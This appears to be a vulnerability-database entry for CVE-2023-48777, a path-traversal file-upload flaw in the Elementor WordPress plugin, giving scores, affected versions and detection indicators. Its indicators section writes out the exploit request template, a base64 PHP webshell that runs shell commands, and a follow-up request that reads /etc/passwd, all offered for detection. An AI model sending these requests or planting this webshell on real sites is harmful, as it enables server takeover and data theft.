cbcvebase.
CVE-2023-48777
published 2024-03-26

CVE-2023-48777: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from…

PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.10%
89.5th percentile
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.

Affected

2 ranges
VendorProductVersion rangeFixed in
elementor.comelementor_website_builder3.3.0 – 3.18.1
elementorwebsite_builder>= 3.3.0 < 3.18.23.18.2

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin-ajax.php
path/wp-content/plugins/elementor/
commandactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
command{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}
path/../../../../<random>.php
url/wp-content/<random>.php?cmd=cat+/etc/passwd
url/wp-admin/post.php?post=1&action=elementor
bytes
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
  • Exploit targets the `elementor_ajax` action via admin-ajax.php with an `import_template` sub-action to upload a PHP webshell via path traversal in the `fileName` parameter.
  • The uploaded PHP webshell payload (base64: PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=) decodes to `<?php echo system($_GET['cmd']); ?>` — monitor for this string in uploaded files or POST bodies.
  • Path traversal sequence `/../../../../` in the `fileName` field of the import_template action is used to place the PHP file outside the intended upload directory — alert on this pattern in POST bodies to admin-ajax.php.
  • After upload, the webshell is accessed under /wp-content/<filename>.php with a `cmd` GET parameter — monitor for unexpected PHP file access under /wp-content/ with shell command parameters.
  • Successful exploitation confirmed by `root:.*:0:0:` pattern in HTTP response body — use this as a post-exploitation indicator in web server logs or WAF response inspection.
  • Vulnerability affects Elementor Website Builder versions 3.3.0 through 3.18.1; presence of the plugin at /wp-content/plugins/elementor/ on unpatched sites is a risk indicator.
  • ·Exploitation requires authentication at contributor-level or above; unauthenticated exploitation is not possible.
  • ·Fixed in Elementor version 3.18.2; systems running 3.18.2 or later are not affected.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.